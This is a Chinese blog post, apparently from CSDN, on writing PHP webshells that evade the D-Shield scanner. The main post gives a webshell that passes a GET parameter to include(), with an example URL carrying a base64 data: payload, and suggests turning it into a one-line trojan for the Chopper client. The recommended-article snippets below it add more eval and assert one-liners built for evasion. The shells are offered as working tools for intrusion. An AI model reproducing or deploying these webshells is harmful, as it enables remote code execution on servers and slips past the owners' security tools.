最新绕过D盾的php Webshell

最新推荐文章于 2024-09-21 12:09:56 发布
原创 最新推荐文章于 2024-09-21 12:09:56 发布 · 518 阅读 · 0 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了一种通过修改PHP代码结构来绕过D盾安全检测的方法,利用GET请求动态加载本地或远程文件,实现木马绕过。实战中可将代码简化为一句话木马,便于使用菜刀等工具进行连接。

去年分析D盾的查杀规律弄的绕过。
查杀效果:

具体请看代码:

<?php
function cc(){
    global $b;
    $a =$_GET[$b];  //此处可改成POST方式
    $str =$a;
    return $str;
}
?>
<?php
$b="url";
$c=cc();
$aa = $c;

include($aa);

传入参数方式:
http://127.0.0.1/test/include.php?url=本地或远程文件名(或者利用data:image/png的这种格式)
例如:
http://127.0.0.1/test/include.php?url=data:image/png;base64,PD9waHAgcGhwaW5mbygpOyA/Pg==
上看base64,后面为要执行的代码,代码要带,实战中可以把代码改成一句话,然后使用菜刀连接即可。

过Dphp webshell免杀马探讨
goddemon
07-19 1903
本文章仅用于渗透交流学习,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任最近有在系统的总计waf绕过内容和后缀的绕过,把以前别的师傅发过的很多东西做了一些总结在这个过程中发觉了其实webshell的bypass手法还是蛮多的后缀bypass总结完了经过实战也绕过了很多家最新的waf后缀内容的还没写完东西有点多这里就分享一些php免杀的马全过的也有贼多但是暂时就不分享了。......
绕过D,D实战绕过
11-18
绕过D实战,想学习的同学。。抓紧,这是一个带实战的视频。更有一个提升。
Webshell如何bypass安全狗,D
Fly_鹏程万里
01-22 1900
前言 相信各位师傅都有自己过waf一句话的思路,我这写一下自己常用的思路与及具体方法,如有错误,还望大家斧正。上次很多师傅问我要的web漏扫的github地址抱歉还不能给你们,(毕设没答辩完,而且还没写完Orz) Webshell 这里,我主要是写phpwebshell的bypass(主要是其他的没研究过),安全狗的版本是在官网下载的apache4.0版本。 D是2.0.9的 ...
Bypass D_IIS防火墙SQL注入防御(多姿势)
09-14 1743
&#13; 0X01 前言&#13;   D_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL...
php前端后缀名绕过,有关上传webshell文件绕过的总结
weixin_39911916的博客
03-28 1431
2017-08-15下午碰到一个站,有两处上传漏洞,通过一个点获取了webshell,尝试另一个点获取shell,还使用了白盒测试,然而并没有绕过。总结一下,碰到文件上传的好事,应该如何绕过后缀名1. 前台脚本检测扩展名由于是客户端脚本的检测,任何的逻辑都可以通过burpsuit抓包,直接更改报文内容,替换文件扩展名2. Content-Type检测文件类型-绕过Content-Type检测是对h...
网络安全-webshell绕过,hash碰撞,webshell绕过原理
最新发布
m0_68976043的博客
09-21 1805
那既然这样我们怎么去处理呢,这个是非常巧妙的current是返回当前数组的元素,也就是当前数组的值current,此时它就从current重新变成了current($_POST[a])($_POST[b]),变成它a是一个数组,b就是你的任意命令。当然,这只是两款免费的webshell查杀工具,当前我们算是绕过了,但如果是花钱买的,这个动态传参多半是可以监控到的,因为用户可以控制,至少免费的绕过了,如何去利用呢,call_user_func老朋友了,回调函数。
PHP小马免杀的浅谈[过最新D]1
08-03
文章中提到了两种绕过D检测的方法。 **方法一:使用写文件函数** 首先,作者提到了使用`file_put_contents`函数来创建一个新的PHP文件,然后通过`include`或`require`来执行这个文件。然而,这种方法在PHP7.0...
php绕过d,巧用匿名函数绕过D
weixin_34980267的博客
03-16 322
原标题:巧用匿名函数绕过D之前看了smile大佬的webshell绕过,跟着smile大佬的思路,自己来挖掘了一下绕过D的方式附上链接 https://www.anquanke.com/post/id/197631这篇文章中,smile大佬提到了非常多的绕过D方式,我就不重复了,我在这里主要是利用了匿名函数来绕过D在p神的博客中,找到了这么一个图片https://www.leavesong...
绕过D的一句话
03-05 5916
一个很简单的一个技巧,作个笔记,可以绕过D检测。 新建test1.php &lt;?php eval($_POST[g]); ?&gt; 新建test2.php &lt;?php $a="$_POST[g]"; eval($a=$a); ?&gt; 使用D_Web查杀 V2.0.9 进行查杀,test1.php可以查杀出来,但是test2.php无法查杀。 那么问题就出现...
Bypass D_防火墙(新版)SQL注入防御.pdf
12-21
Bypass D_防火墙(新版)SQL注入防御.pdf
个人发卡网(完全无后门)可过D扫描
09-12
0后门。放心使用,经过D扫描0后门。不放心可以自己用D扫描一下后门
第06篇:Bypass D_IIS防火墙SQL注入防御(多姿势)1
08-03
思路:a、白名单 b、绕过union select或select from的检测搭建这个window2003+IIS+php+mysql,可花费不少时间,测试过
注入mysql win2003服务器密码_Win2003服务器防SQL注入神器--D_IIS防火墙
weixin_36464343的博客
01-19 244
0X01 前言D_IIS防火墙,目前只支持Win2003服务器,前阵子看见官方博客说D新版将近期推出,相信功能会更强大,这边分享一下之前的SQL注入防御的测试情况。D_IIS防火墙注入防御策略,如下图,主要防御GET/POST/COOKIE,文件允许白名单设置。构造不同的测试环境,IIS+(ASP/ASPX/PHP)+(MSSQL/MYSQL),看到这边的策略,主要的测试思路:a、白名单 ...
php一句话-D绕过小技巧
zzgslh的博客
03-05 6240
php一句话-D绕过小技巧,Platypus多会话的交互式反向 Shell 管理器
简单绕过d (免杀马)
wsitcj的博客
03-29 783
用代码执行的思路绕过,设置一个类,把他绕晕(手动滑稽) <?php Class hello{ public function pingjie(){ $a="ass"; $b="ert"; return $a.$b; } public function __construct($str){ $this->name = $str; } public function __destruct(){ $t=$this->pingjie(); $t($this
浅谈PHP大马免杀之如何过狗过宝塔过阿里云D
iphp666的博客
09-17 3571
PHP免杀方法有很多,加密混淆字符转换拆分等等都可以达到目的,下面来简单介绍几种免杀PHP大马的方法,一句话思路也是一样 拿我很喜欢的一款php大马来示范,这个马支持cmd命令,编辑文件不会空白,界面非常经典,最重要的是支持php7,高音甜中音准低音沉,总之一句话,就是通透! <?php $password='haha';//登录密码 //----------功能程序-----------...
绕过Dphp一句话
weixin_30847271的博客
04-23 1034
d_dun.php <?php $a = '小狗狗你好啊'; $b = '小你好啊'; foreach ($_REQUEST as $key => $value) { $$key = $value; } 注入页插入: <?php include 'd_dun.php'; $b( $a ); 注入页调用: ?b=ass...
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值